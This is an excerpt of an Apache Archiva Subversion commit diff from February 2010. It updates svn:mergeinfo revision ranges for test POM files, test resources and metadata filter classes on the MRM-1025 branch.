/archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:825850-899477 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:825850-899477 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:825850-899477 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:686983-687034 